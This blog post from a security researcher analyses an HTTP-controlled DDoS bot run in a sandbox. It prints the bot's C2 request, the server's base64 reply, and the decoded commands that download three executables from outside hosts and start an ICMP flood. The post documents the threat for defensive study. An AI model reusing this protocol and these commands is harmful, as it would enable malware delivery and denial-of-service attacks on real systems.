< Good ol' #CCpower | Gpcode.ak vs. CWSandbox >

HTTP-based Botnets

We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:
POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E


The answer from the server is:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0

The response is base64-encoded and decoding leads to the following (obfuscated) commands:
10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;

Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.
This entry was posted by Thorsten Holz on Saturday, June 7. 2008 at 15:30. and is filed under malware. You can leave a response, or trackback from your own blog. All new comments are subject to moderation before being displayed.

Trackbacks

Trackback specific URI for this entry

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

  1. SonNP says:
    #1 2008-06-07 18:28 (Reply)

    These bots look like a BlackEnergy variants or based on BlackEnergy idea.

  2. Thorsten says:
    #1.1 2008-06-13 17:03 (Reply)

    Yes, this is related to the ideas / techniques introduced by BlackEnery.

  3. Pandi says:
    #2 2008-06-09 18:06 (Reply)

    Is it this tool ?
    http://research.pandasecurity.com/archive/The-rise-of-the-2800_http_2900-botnet.aspx


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.